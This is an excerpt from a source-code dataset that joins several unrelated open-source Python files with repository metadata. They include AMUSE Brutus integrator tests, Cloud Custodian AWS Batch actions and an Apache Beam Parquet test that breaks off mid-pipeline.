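            # and the division by `degree` turns that aggregate into a mean.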
for i in tqdm(range(0, self.num_features, dim_chunk_size)):
j = min(i + dim_chunk_size, self.num_features)
inputs = get_col_slice(author_feat, start_row_idx=0,
end_row_idx=dataset.num_authors,
start_col_idx=i, end_col_idx=j)
inputs = paddle.to_tensor(inputs, dtype='float32')
outputs = institution_graph.send_recv(inputs)
outputs = outputs / degree
outputs = outputs.astype('float16').numpy()
del inputs
save_col_slice(
x_src=outputs, x_dst=institution_x, start_row_idx=0,
end_row_idx=dataset.num_institutions,
start_col_idx=i, end_col_idx=j)
del outputs
institution_x.flush()
del institution_x
log.info(f'Done! [{time.perf_counter() - t:.2f}s]')
if __name__ == "__main__":
root = 'dataset_path'
print(root)
dataset = MAG240M(root)
dataset.prepare_data()
| 38.009346
| 91
| 0.592083
|
4e1c1c3c7163caea0c2e8ec95f8c40b3442eaa0e
| 602
|
py
|
Python
|
i3py/core/actions/__init__.py
|
Ecpy/i3py
|
6f004d3e2ee2b788fb4693606cc4092147655ce1
|
[
"BSD-3-Clause"
] | 1
|
2018-03-20T09:24:54.000Z
|
2018-03-20T09:24:54.000Z
|
i3py/core/actions/__init__.py
|
Ecpy/i3py
|
6f004d3e2ee2b788fb4693606cc4092147655ce1
|
[
"BSD-3-Clause"
] | 7
|
2017-10-11T17:15:17.000Z
|
2018-01-22T14:31:50.000Z
|
i3py/core/actions/__init__.py
|
Exopy/i3py
|
6f004d3e2ee2b788fb4693606cc4092147655ce1
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright 2016-2017 by I3py Authors, see AUTHORS for more details.
#
# Distributed under the terms of the BSD license.
#
# The full license is in the file LICENCE, distributed with this software.
# -----------------------------------------------------------------------------
"""Actions are used to wrap method and mark them as acting on the instrument.
"""
from .action import BaseAction, Action
from .register_action import RegisterAction
__all__ = ['BaseAction', 'Action', 'RegisterAction']
| 37.625
| 79
| 0.548173
|
479f6b0ee791e687b78741aef9d79878ed45c36d
| 462
|
py
|
Python
|
openapi_schema_validator/__init__.py
|
sebastianmika/openapi-schema-validator
|
b36c12b7356328901b9386e8b7f71d4bf2369a71
|
[
"BSD-3-Clause"
] | 32
|
2020-06-05T13:05:46.000Z
|
2022-03-08T23:10:08.000Z
|
openapi_schema_validator/__init__.py
|
sebastianmika/openapi-schema-validator
|
b36c12b7356328901b9386e8b7f71d4bf2369a71
|
[
"BSD-3-Clause"
] | 40
|
2020-03-05T11:18:07.000Z
|
2022-02-14T10:01:45.000Z
|
openapi_schema_validator/__init__.py
|
sebastianmika/openapi-schema-validator
|
b36c12b7356328901b9386e8b7f71d4bf2369a71
|
[
"BSD-3-Clause"
] | 19
|
2020-03-13T15:11:33.000Z
|
2022-02-28T09:48:00.000Z
|
# -*- coding: utf-8 -*-
from openapi_schema_validator._format import oas30_format_checker
from openapi_schema_validator.shortcuts import validate
from openapi_schema_validator.validators import OAS30Validator
__author__ = 'Artur Maciag'
__email__ = 'maciag.artur@gmail.com'
__version__ = '0.1.6'
__url__ = 'https://github.com/p1c2u/openapi-schema-validator'
__license__ = '3-clause BSD License'
__all__ = ['validate', 'OAS30Validator', 'oas30_format_checker']
| 35.538462
| 65
| 0.796537
|
08d7a45c3778d4a0ae5a402e5dfeb0904e43546b
| 1,893
|
py
|
Python
|
idaes/surrogate/alamopy_depr/examples.py
|
carldlaird/idaes-pse
|
cc7a32ca9fa788f483fa8ef85f3d1186ef4a596f
|
[
"RSA-MD"
] | 112
|
2019-02-11T23:16:36.000Z
|
2022-03-23T20:59:57.000Z
|
idaes/surrogate/alamopy_depr/examples.py
|
carldlaird/idaes-pse
|
cc7a32ca9fa788f483fa8ef85f3d1186ef4a596f
|
[
"RSA-MD"
] | 621
|
2019-03-01T14:44:12.000Z
|
2022-03-31T19:49:25.000Z
|
idaes/surrogate/alamopy_depr/examples.py
|
carldlaird/idaes-pse
|
cc7a32ca9fa788f483fa8ef85f3d1186ef4a596f
|
[
"RSA-MD"
] | 154
|
2019-02-01T23:46:33.000Z
|
2022-03-23T15:07:10.000Z
|
#!/usr/bin/python
#################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
import numpy as np
import sys
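# The functions below are standard global-optimization test surfaces (the
# six-hump camel, Ackley, and Branin functions, the latter with added Gaussian
# noise), used as example black boxes for ALAMO surrogate fitting.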
def sixcamel(*x):
x1, x2 = x
t1 = np.multiply(4.0 - 2.1 * np.power(x1, 2) + np.divide(np.power(x1, 4), 3.0),
np.power(x1, 2))
t2 = np.multiply(4 * np.power(x2, 2) - 4,
np.power(x2, 2))
z = t1 + np.multiply(x1, x2) + t2
return z
def ackley(*x):
import numpy as np
x1, x2 = x
a = 20
b = 0.2
c = 2 * 3.14159
z = -a * np.exp(-b * np.sqrt(0.5 * (x1**2 + x2**2))) \
- np.exp(0.5 * (np.cos(c * x1) + np.cos(c * x2))) + a + np.exp(1)
return z
def branin(*x):
import numpy as np
x1, x2 = x
pi = 3.14159
    z = (x2 - (5.1 / (4 * pi**2)) * x1**2 + (5 / pi) * x1 - 6)**2 \
        + 10 * (1 - (1 / (8 * pi))) * np.cos(x1) + 10 + np.random.normal(0, 0.1)
return z
if __name__ == '__main__':
    sys.stdout.write(' ALAMOpy example functions \n')
    sys.stdout.write(' call functions with : \n')
    sys.stdout.write(' examples.<name>\n')
    sys.stdout.write(' <name> = branin \n')
    sys.stdout.write(' sixcamel \n')
    sys.stdout.write(' ackley \n')
| 34.418182
| 83
| 0.544638
|
25fed5d60879939ede0386670a20575bed1ac575
| 18,163
|
py
|
Python
|
src/amuse/test/suite/codes_tests/test_brutus.py
|
rknop/amuse
|
85d5bdcc29cfc87dc69d91c264101fafd6658aec
|
[
"Apache-2.0"
] | 131
|
2015-06-04T09:06:57.000Z
|
2022-02-01T12:11:29.000Z
|
src/amuse/test/suite/codes_tests/test_brutus.py
|
rknop/amuse
|
85d5bdcc29cfc87dc69d91c264101fafd6658aec
|
[
"Apache-2.0"
] | 690
|
2015-10-17T12:18:08.000Z
|
2022-03-31T16:15:58.000Z
|
src/amuse/test/suite/codes_tests/test_brutus.py
|
rieder/amuse
|
3ac3b6b8f922643657279ddee5c8ab3fc0440d5e
|
[
"Apache-2.0"
] | 102
|
2015-01-22T10:00:29.000Z
|
2022-02-09T13:29:43.000Z
|
import os
import os.path
import math
from amuse.community import *
from amuse.test.amusetest import TestWithMPI
from amuse.units import units, nbody_system, constants
from amuse.datamodel import Particles
from amuse.community.brutus.interface import BrutusInterface, Brutus
import random
try:
import mpmath
HAS_MPMATH=True
except ImportError:
HAS_MPMATH=False
class TestBrutusInterface(TestWithMPI):
def test1(self):
print("Test BrutusInterface initialization")
instance = self.new_instance_of_an_optional_code(BrutusInterface)
self.assertEqual(0, instance.initialize_code())
self.assertEqual(0, instance.set_brutus_output_directory(instance.output_directory))
self.assertEqual(0, instance.commit_parameters())
self.assertEqual(0, instance.cleanup_code())
instance.stop()
def test2(self):
print("Test BrutusInterface new_particle / get_state")
instance = self.new_instance_of_an_optional_code(BrutusInterface)
self.assertEqual(0, instance.initialize_code())
self.assertEqual(0, instance.set_brutus_output_directory(instance.output_directory))
self.assertEqual(0, instance.commit_parameters())
id, error = instance.new_particle(mass = 11.0, radius = 2.0, x = 0.0, y = 0.0, z = 0.0, vx = 0.0, vy = 0.0, vz = 0.0)
self.assertEqual(0, error)
self.assertEqual(0, id)
id, error = instance.new_particle(mass = 21.0, radius = 5.0, x = 10.0, y = 0.0, z = 0.0, vx = 10.0, vy = 0.0, vz = 0.0)
self.assertEqual(0, error)
self.assertEqual(1, id)
self.assertEqual(0, instance.commit_particles())
retrieved_state1 = instance.get_state(0)
retrieved_state2 = instance.get_state(1)
self.assertEqual(0, retrieved_state1['__result'])
self.assertEqual(0, retrieved_state2['__result'])
self.assertEqual(11.0, retrieved_state1['mass'])
self.assertEqual(21.0, retrieved_state2['mass'])
self.assertEqual( 0.0, retrieved_state1['x'])
self.assertEqual(10.0, retrieved_state2['x'])
self.assertEqual(0, instance.cleanup_code())
instance.stop()
def test4(self):
print("Test BrutusInterface particle property getters/setters")
instance = self.new_instance_of_an_optional_code(BrutusInterface)
self.assertEqual(0, instance.initialize_code())
self.assertEqual(0, instance.set_brutus_output_directory(instance.output_directory))
self.assertEqual(0, instance.commit_parameters())
self.assertEqual([0, 0], list(instance.new_particle(0.01, 1, 0, 0, 0, 1, 0, 0.1).values()))
self.assertEqual([1, 0], list(instance.new_particle(0.02, -1, 0, 0, 0,-1, 0, 0.1).values()))
self.assertEqual(0, instance.commit_particles())
# getters
mass, result = instance.get_mass(0)
self.assertAlmostEqual(0.01, mass)
self.assertEqual(0,result)
radius, result = instance.get_radius(1)
self.assertAlmostEqual(0.1, radius)
self.assertEqual(0,result)
#self.assertEquals(-3, instance.get_mass(2)['__result']) # Particle not found
self.assertEqual([ 1, 0, 0, 0], list(instance.get_position(0).values()))
self.assertEqual([-1, 0, 0, 0], list(instance.get_position(1).values()))
self.assertEqual([ 0, 1, 0, 0], list(instance.get_velocity(0).values()))
self.assertEqual([ 0,-1, 0, 0], list(instance.get_velocity(1).values()))
# setters
self.assertEqual(0, instance.set_state(0, 0.01, 1,2,3, 4,5,6, 0.1))
self.assertEqual([0.01, 1.0,2.0,3.0, 4.0,5.0,6.0, 0.1, 0], list(instance.get_state(0).values()))
self.assertEqual(0, instance.set_mass(0, 0.02))
self.assertEqual([0.02, 1.0,2.0,3.0, 4.0,5.0,6.0, 0.1, 0], list(instance.get_state(0).values()))
self.assertEqual(0, instance.set_radius(0, 0.2))
self.assertEqual([0.02, 1.0,2.0,3.0, 4.0,5.0,6.0, 0.2, 0], list(instance.get_state(0).values()))
self.assertEqual(0, instance.set_position(0, 10,20,30))
self.assertEqual([0.02, 10.0,20.0,30.0, 4.0,5.0,6.0, 0.2, 0], list(instance.get_state(0).values()))
self.assertEqual(0, instance.set_velocity(0, 40,50,60))
self.assertEqual([0.02, 10.0,20.0,30.0, 40.0,50.0,60.0, 0.2, 0], list(instance.get_state(0).values()))
self.assertEqual(0, instance.cleanup_code())
instance.stop()
def test5(self):
print("Test BrutusInterface parameters")
instance = self.new_instance_of_an_optional_code(BrutusInterface)
self.assertEqual(0, instance.initialize_code())
# word length
self.assertEqual([64, 0], list(instance.get_word_length().values()))
self.assertEqual(0, instance.set_word_length(80))
self.assertEqual([80, 0], list(instance.get_word_length().values()))
# bs tolerance, default (double) implementation
self.assertEqual([1.0e-6, 0], list(instance.get_bs_tolerance().values()))
self.assertEqual(0, instance.set_bs_tolerance(1.0e-8))
self.assertEqual([1.0e-8, 0], list(instance.get_bs_tolerance().values()))
# bs tolerance, string implementation for values requiring higher precision (note: actual accuracy depends on word_length)
#self.assertEquals(1e-8, eval(instance.get_bs_tolerance_string()[""]))
#self.assertEquals(0, instance.set_bs_tolerance_string("1e-10"))
#self.assertEquals(["1e-10", 0], instance.get_bs_tolerance_string().values())
# eta, float64
self.assertEqual([0.24, 0], list(instance.get_eta().values()))
self.assertEqual(0, instance.set_eta(0.10))
self.assertEqual([0.10, 0], list(instance.get_eta().values()))
# eta, string
#self.assertEquals(["0.10", 0], instance.get_eta_string().values())
self.assertEqual(0, instance.set_eta_string("123"))
self.assertEqual(["123", 0], list(instance.get_eta_string().values()))
# output dir
#self.assertEquals(["./", 0], instance.get_brutus_output_directory().values())
self.assertEqual(0, instance.set_brutus_output_directory("./out"))
self.assertEqual(["./out/", 0], list(instance.get_brutus_output_directory().values()))
self.assertEqual(0, instance.set_brutus_output_directory(instance.output_directory))
self.assertEqual([instance.output_directory+"/", 0], list(instance.get_brutus_output_directory().values()))
self.assertEqual(0, instance.commit_parameters())
self.assertEqual(0, instance.cleanup_code())
instance.stop()
def test6(self):
print("Test BrutusInterface evolve_model, equal-mass binary")
instance = self.new_instance_of_an_optional_code(BrutusInterface)
self.assertEqual(0, instance.initialize_code())
self.assertEqual(0, instance.set_bs_tolerance(1.0e-10))
self.assertEqual(0, instance.set_word_length(72))
self.assertEqual(0, instance.commit_parameters())
self.assertEqual([0, 0], list(instance.new_particle(0.5, 0.5, 0, 0, 0, 0.5, 0).values()))
self.assertEqual([1, 0], list(instance.new_particle(0.5, -0.5, 0, 0, 0,-0.5, 0).values()))
self.assertEqual(0, instance.commit_particles())
self.assertEqual(0, instance.evolve_model(math.pi)) # half an orbit
for result, expected in zip(instance.get_position(0).values(), [-0.5, 0.0, 0.0, 0]):
self.assertAlmostEqual(result, expected, 5)
self.assertEqual(0, instance.evolve_model(2 * math.pi)) # full orbit
for result, expected in zip(instance.get_position(0).values(), [0.5, 0.0, 0.0, 0]):
self.assertAlmostEqual(result, expected, 5)
self.assertEqual(0, instance.cleanup_code())
instance.stop()
def test7(self):
print("Test BrutusInterface evolve_model, pythagorean problem")
instance = self.new_instance_of_an_optional_code(BrutusInterface)
self.assertEqual(0, instance.initialize_code())
self.assertEqual(0, instance.set_bs_tolerance(1.0e-6))
self.assertEqual(0, instance.set_word_length(56))
self.assertEqual(0, instance.commit_parameters())
self.assertEqual([0, 0], list(instance.new_particle("3", "1", "3", "0", "0", "0", "0").values()))
self.assertEqual([1, 0], list(instance.new_particle("4", "-2", "-1", "0", "0", "0", "0").values()))
self.assertEqual([2, 0], list(instance.new_particle("5", "1", "-1", "0", "0", "0", "0").values()))
self.assertEqual(0, instance.commit_particles())
self.assertEqual(0, instance.evolve_model(10))
        # Check the final coordinates of the first particle against reference values
for result, expected in zip(instance.get_position(0).values(), [0.778480410138085492274810667212415, 0.141392300290086165745727207379442, 0, 0]):
self.assertAlmostEqual(result, expected, 3)
self.assertEqual(0, instance.cleanup_code())
instance.stop()
def test8(self):
print("Test BrutusInterface string parameters")
instance = self.new_instance_of_an_optional_code(BrutusInterface)
instance.initialize_code()
instance.set_word_length(128)
for i in range(100):
x=random.random()
x=str(x)
instance.set_eta_string(x)
x_,err=instance.get_eta_string()
instance.set_eta_string(x_)
x__,err=instance.get_eta_string()
#~ assert x==x_
self.assertEqual(x_,x__)
instance.stop()
class TestBrutus(TestWithMPI):
def new_sun_earth_system(self):
particles = Particles(2)
particles.mass = [1.0, 3.0037e-6] | units.MSun
particles.radius = 1.0 | units.RSun
particles.position = [[0.0, 0.0, 0.0], [1.0, 0.0, 0.0]] | units.AU
particles.velocity = [[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]] | units.km / units.s
particles[1].vy = (constants.G * particles.total_mass() / (1.0 | units.AU)).sqrt()
return particles
def test1(self):
print("Testing Brutus initialization")
convert_nbody = nbody_system.nbody_to_si(1.0 | units.MSun, 1.0 | units.AU)
instance = self.new_instance_of_an_optional_code(Brutus, convert_nbody)
instance.initialize_code()
instance.commit_parameters()
instance.cleanup_code()
instance.stop()
def test2(self):
print("Testing Brutus parameters")
convert_nbody = nbody_system.nbody_to_si(1.0 | units.MSun, 1.0 | units.AU)
instance = self.new_instance_of_an_optional_code(Brutus,convert_nbody)
instance.initialize_code()
# print instance.parameters
self.assertEqual(instance.parameters.bs_tolerance, 1.0e-6)
instance.parameters.bs_tolerance = 1.0e-9
self.assertEqual(instance.parameters.bs_tolerance, 1.0e-9)
self.assertEqual(instance.parameters.word_length, 64)
instance.parameters.word_length = 128
self.assertEqual(instance.parameters.word_length, 128)
self.assertEqual(instance.parameters.dt_param, 0.24)
instance.parameters.dt_param = 0.10
self.assertEqual(instance.parameters.dt_param, 0.10)
self.assertEqual(instance.parameters.brutus_output_directory, instance.output_directory + os.sep)
instance.parameters.brutus_output_directory = "./out"
self.assertEqual(instance.parameters.brutus_output_directory, "./out/")
instance.parameters.brutus_output_directory = instance.output_directory
self.assertEqual(instance.parameters.brutus_output_directory, instance.output_directory + os.sep)
instance.cleanup_code()
instance.stop()
def test3(self):
print("Testing Brutus particles")
convert_nbody = nbody_system.nbody_to_si(1.0 | units.MSun, 1.0 | units.AU)
instance = self.new_instance_of_an_optional_code(Brutus,convert_nbody)
instance.initialize_code()
instance.commit_parameters()
instance.particles.add_particles(self.new_sun_earth_system())
instance.commit_particles()
self.assertAlmostEqual(instance.particles.mass, [1.0, 3.0037e-6] | units.MSun)
self.assertAlmostEqual(instance.particles.radius, 1.0 | units.RSun)
self.assertAlmostEqual(instance.particles.position,
[[0.0, 0.0, 0.0], [1.0, 0.0, 0.0]] | units.AU)
self.assertAlmostEqual(instance.particles.velocity,
[[0.0, 0.0, 0.0], [0.0, 29.7885, 0.0]] | units.km / units.s, 3)
instance.cleanup_code()
instance.stop()
def test4(self):
print("Testing Brutus evolve_model, 2 particles")
particles = Particles(2)
particles.mass = 0.5 | units.MSun
particles.radius = 1.0 | units.RSun
particles.position = [[0.0, 0.0, 0.0], [1.0, 0.0, 0.0]] | units.AU
particles.velocity = [[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]] | units.km / units.s
particles[1].vy = (constants.G * (1.0 | units.MSun) / (1.0 | units.AU)).sqrt()
particles.move_to_center()
convert_nbody = nbody_system.nbody_to_si(1.0 | units.MSun, 1.0 | units.AU)
instance = self.new_instance_of_an_optional_code(Brutus, convert_nbody)
instance.initialize_code()
instance.parameters.bs_tolerance = 1e-6
instance.parameters.word_length = 56
instance.commit_parameters()
instance.particles.add_particles(particles)
instance.commit_particles()
primary = instance.particles[0]
P = 2 * math.pi * primary.x / primary.vy
position_at_start = primary.position.x
instance.evolve_model(P / 4.0)
self.assertAlmostRelativeEqual(position_at_start, primary.position.y, 6)
instance.evolve_model(P / 2.0)
self.assertAlmostRelativeEqual(position_at_start, -primary.position.x, 6)
instance.evolve_model(P)
self.assertAlmostRelativeEqual(position_at_start, primary.position.x, 6)
instance.cleanup_code()
instance.stop()
def sun_and_planets(self):
particles = Particles(9)
sun = particles[0]
mercury = particles[1]
venus = particles[2]
earth = particles[3]
mars = particles[4]
jupiter = particles[5]
saturn = particles[6]
uranus = particles[7]
neptune = particles[8]
sun.mass = 1047.517| units.MJupiter
sun.radius = 1.0 | units.RSun
sun.position = ( 0.005717 , -0.00538 , -2.130e-5 ) | units.AU
sun.velocity = ( 0.007893 , 0.01189 , 0.0002064 ) | units.kms
mercury.mass = 0.000174 | units.MJupiter
mercury.radius = 0 | units.RSun
mercury.position = ( -0.31419 , 0.14376 , 0.035135 ) | units.AU
mercury.velocity = ( -30.729 , -41.93 , -2.659 ) | units.kms
venus.mass = 0.002564 | units.MJupiter
venus.radius = 0 | units.RSun
venus.position = ( -0.3767 , 0.60159 , 0.0393 ) | units.AU
venus.velocity = ( -29.7725 , -18.849 , 0.795 ) | units.kms
earth.mass = 0.003185 | units.MJupiter
earth.radius = 0 | units.RSun
earth.position = ( -0.98561 , 0.0762 , -7.847e-5 ) | units.AU
earth.velocity = ( -2.927 , -29.803 , -0.000533 ) | units.kms
mars.mass = 0.000338 | units.MJupiter
mars.radius = 0 | units.RSun
mars.position = ( -1.2895 , -0.9199 , -0.048494 ) | units.AU
mars.velocity = ( 14.9 , -17.721 , 0.2979 ) | units.kms
jupiter.mass = 1 | units.MJupiter
jupiter.radius = 0 | units.RSun
jupiter.position = ( -4.9829 , 2.062 , -0.10990 ) | units.AU
jupiter.velocity = ( -5.158 , -11.454 , -0.13558 ) | units.kms
saturn.mass = 0.29947 | units.MJupiter
saturn.radius = 0 | units.RSun
saturn.position = ( -2.075 , 8.7812 , 0.3273 ) | units.AU
saturn.velocity = ( -9.9109 , -2.236 , -0.2398 ) | units.kms
uranus.mass = 0.045737 | units.MJupiter
uranus.radius = 0 | units.RSun
uranus.position = ( -12.0872 , -14.1917 , 0.184214 ) | units.AU
uranus.velocity = ( 5.1377 , -4.7387 , -0.06108 ) | units.kms
neptune.mass = 0.053962 | units.MJupiter
neptune.radius = 0 | units.RSun
neptune.position = ( 3.1652 , 29.54882 , 0.476391 ) | units.AU
neptune.velocity = ( -5.443317 , 0.61054 , -0.144172 ) | units.kms
particles.move_to_center()
return particles
def test5(self):
if not HAS_MPMATH:
self.skip("mpmath not available")
print("MPmath available -> Doing tests")
bodies = self.sun_and_planets()
convert_nbody = nbody_system.nbody_to_si(bodies.mass.sum(),bodies[1].position.length())
gravity = Brutus(convert_nbody,number_of_workers=1)
gravity.parameters.bs_tolerance = 1e-30
gravity.parameters.word_length = 180
gravity.parameters.dt_param = 0.0000000000010
gravity.particles.add_particles(bodies)
Etot_init = gravity.kinetic_energy + gravity.potential_energy
Ein = gravity.get_total_energy_p_si()
gravity.evolve_model(gravity.model_time + (30| units.day))
Eout = gravity.get_total_energy_p_si()
Ekin = gravity.kinetic_energy
Epot = gravity.potential_energy
Etot = Ekin + Epot
Loss_double = ((Etot_init-Etot)/gravity.get_time())
Loss_mp = (Ein - Eout)/gravity.get_time_p_si()
print("Loss with \"normal\" double =",Loss_double.number," (W)")
print("Loss with multiprecision =",Loss_mp," (W)")
gravity.stop()
self.assertTrue((Loss_mp <= 0.0000007) and (Loss_mp > 0.0000006))
| 43.978208
| 153
| 0.628475
|
4500bb8509d6fba4bc03cb2a60e0813c3a500647
| 6,440
|
py
|
Python
|
c7n/resources/batch.py
|
CliffJumper/cloud-custodian
|
47d2f0aa990d2179c8f6764ac53c12720069ddcb
|
[
"Apache-2.0"
] | null | null | null |
c7n/resources/batch.py
|
CliffJumper/cloud-custodian
|
47d2f0aa990d2179c8f6764ac53c12720069ddcb
|
[
"Apache-2.0"
] | null | null | null |
c7n/resources/batch.py
|
CliffJumper/cloud-custodian
|
47d2f0aa990d2179c8f6764ac53c12720069ddcb
|
[
"Apache-2.0"
] | 1
|
2019-11-06T16:54:06.000Z
|
2019-11-06T16:54:06.000Z
|
# Copyright 2017-2018 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function, unicode_literals
from c7n.manager import resources
from c7n.query import QueryResourceManager
from c7n.actions import BaseAction
from c7n.utils import local_session, type_schema
@resources.register('batch-compute')
class ComputeEnvironment(QueryResourceManager):
class resource_type(object):
service = 'batch'
filter_name = 'computeEnvironments'
filter_type = 'list'
dimension = None
id = name = "computeEnvironmentName"
enum_spec = (
'describe_compute_environments', 'computeEnvironments', None)
@resources.register('batch-definition')
class JobDefinition(QueryResourceManager):
class resource_type(object):
service = 'batch'
filter_name = 'jobDefinitions'
filter_type = 'list'
dimension = None
id = name = "jobDefinitionName"
enum_spec = (
'describe_job_definitions', 'jobDefinitions', None)
class StateTransitionFilter(object):
"""Filter resources by state.
Try to simplify construction for policy authors by automatically
filtering elements (filters or actions) to the resource states
they are valid for.
"""
valid_origin_states = ()
def filter_resource_state(self, resources, key, states=None):
states = states or self.valid_origin_states
if not states:
return resources
orig_length = len(resources)
results = [r for r in resources if r[key] in states]
if orig_length != len(results):
self.log.warn(
"%s implicitly filtered %d of %d resources with valid %s" % (
self.__class__.__name__,
len(results), orig_length, key.lower()))
return results
@ComputeEnvironment.action_registry.register('update-environment')
class UpdateComputeEnvironment(BaseAction, StateTransitionFilter):
"""Updates an AWS batch compute environment
:example:
    .. code-block:: yaml
policies:
- name: update-environments
resource: batch-compute
filters:
- computeResources.desiredvCpus: 0
- state: ENABLED
actions:
- type: update-environment
state: DISABLED
"""
schema = {
'type': 'object',
'additionalProperties': False,
'properties': {
'type': {'enum': ['update-environment']},
'computeEnvironment': {'type': 'string'},
'state': {'type': 'string', 'enum': ['ENABLED', 'DISABLED']},
'computeResources': {
'type': 'object',
'additionalProperties': False,
'properties': {
'minvCpus': {'type': 'integer'},
'maxvCpus': {'type': 'integer'},
'desiredvCpus': {'type': 'integer'}
}
},
'serviceRole': {'type': 'string'}
}
}
permissions = ('batch:UpdateComputeEnvironment',)
valid_origin_status = ('VALID', 'INVALID')
def process(self, resources):
resources = self.filter_resource_state(
resources, 'status', self.valid_origin_status)
client = local_session(self.manager.session_factory).client('batch')
params = dict(self.data)
params.pop('type')
for r in resources:
params['computeEnvironment'] = r['computeEnvironmentName']
client.update_compute_environment(**params)
@ComputeEnvironment.action_registry.register('delete')
class DeleteComputeEnvironment(BaseAction, StateTransitionFilter):
"""Delete an AWS batch compute environment
:example:
    .. code-block:: yaml
policies:
- name: delete-environments
resource: batch-compute
filters:
- computeResources.desiredvCpus: 0
          actions:
- type: delete
"""
schema = type_schema('delete')
permissions = ('batch:DeleteComputeEnvironment',)
valid_origin_states = ('DISABLED',)
valid_origin_status = ('VALID', 'INVALID')
def delete_environment(self, r):
client = local_session(self.manager.session_factory).client('batch')
client.delete_compute_environment(
computeEnvironment=r['computeEnvironmentName'])
def process(self, resources):
resources = self.filter_resource_state(
self.filter_resource_state(
resources, 'state', self.valid_origin_states),
'status', self.valid_origin_status)
with self.executor_factory(max_workers=2) as w:
list(w.map(self.delete_environment, resources))
@JobDefinition.action_registry.register('deregister')
class DefinitionDeregister(BaseAction, StateTransitionFilter):
"""Deregisters a batch definition
:example:
    .. code-block:: yaml
policies:
- name: deregister-definition
resource: batch-definition
filters:
- containerProperties.image: amazonlinux
actions:
- type: deregister
"""
schema = type_schema('deregister')
permissions = ('batch:DeregisterJobDefinition',)
valid_origin_states = ('ACTIVE',)
def deregister_definition(self, r):
self.client.deregister_job_definition(
jobDefinition='%s:%s' % (r['jobDefinitionName'],
r['revision']))
def process(self, resources):
resources = self.filter_resource_state(
resources, 'status', self.valid_origin_states)
self.client = local_session(
self.manager.session_factory).client('batch')
with self.executor_factory(max_workers=2) as w:
list(w.map(self.deregister_definition, resources))
| 34.074074
| 82
| 0.632453
|
052b54f3ebfbb3a24b0cf606761d7d934536dc80
| 4,673
|
py
|
Python
|
sdks/python/apache_beam/io/parquetio_it_test.py
|
hengfengli/beam
|
83a8855e5997e0311e6274c03bcb38f94efbf8ef
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | 5,279
|
2016-12-29T04:00:44.000Z
|
2022-03-31T22:56:45.000Z
|
sdks/python/apache_beam/io/parquetio_it_test.py
|
hengfengli/beam
|
83a8855e5997e0311e6274c03bcb38f94efbf8ef
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | 14,149
|
2016-12-28T00:43:50.000Z
|
2022-03-31T23:50:22.000Z
|
sdks/python/apache_beam/io/parquetio_it_test.py
|
damondouglas/beam
|
4774ac713f427fefb38114f661516faef26d8207
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | 3,763
|
2016-12-29T04:06:10.000Z
|
2022-03-31T22:25:49.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
import logging
import string
import unittest
from collections import Counter
import pytest
from apache_beam import Create
from apache_beam import DoFn
from apache_beam import FlatMap
from apache_beam import Flatten
from apache_beam import Map
from apache_beam import ParDo
from apache_beam import Reshuffle
from apache_beam.io.filesystems import FileSystems
from apache_beam.io.parquetio import ReadAllFromParquet
from apache_beam.io.parquetio import WriteToParquet
from apache_beam.testing.test_pipeline import TestPipeline
from apache_beam.testing.util import BeamAssertException
from apache_beam.transforms import CombineGlobally
from apache_beam.transforms.combiners import Count
try:
import pyarrow as pa
except ImportError:
pa = None
@unittest.skipIf(pa is None, "PyArrow is not installed.")
class TestParquetIT(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
@pytest.mark.it_postcommit
def test_parquetio_it(self):
file_prefix = "parquet_it_test"
init_size = 10
data_size = 20000
with TestPipeline(is_integration_test=True) as p:
pcol = self._generate_data(p, file_prefix, init_size, data_size)
self._verify_data(pcol, init_size, data_size)
@staticmethod
def _sum_verifier(init_size, data_size, x):
expected = sum(range(data_size)) * init_size
if x != expected:
raise BeamAssertException(
"incorrect sum: expected(%d) actual(%d)" % (expected, x))
return []
@staticmethod
def _count_verifier(init_size, data_size, x):
name, count = x[0].decode('utf-8'), x[1]
counter = Counter(
[string.ascii_uppercase[x % 26] for x in range(0, data_size * 4, 4)])
expected_count = counter[name[0]] * init_size
if count != expected_count:
raise BeamAssertException(
"incorrect count(%s): expected(%d) actual(%d)" %
(name, expected_count, count))
return []
def _verify_data(self, pcol, init_size, data_size):
read = pcol | 'read' >> ReadAllFromParquet()
v1 = (
read
| 'get_number' >> Map(lambda x: x['number'])
| 'sum_globally' >> CombineGlobally(sum)
| 'validate_number' >>
FlatMap(lambda x: TestParquetIT._sum_verifier(init_size, data_size, x)))
v2 = (
read
| 'make_pair' >> Map(lambda x: (x['name'], x['number']))
| 'count_per_key' >> Count.PerKey()
| 'validate_name' >> FlatMap(
lambda x: TestParquetIT._count_verifier(init_size, data_size, x)))
_ = ((v1, v2, pcol)
| 'flatten' >> Flatten()
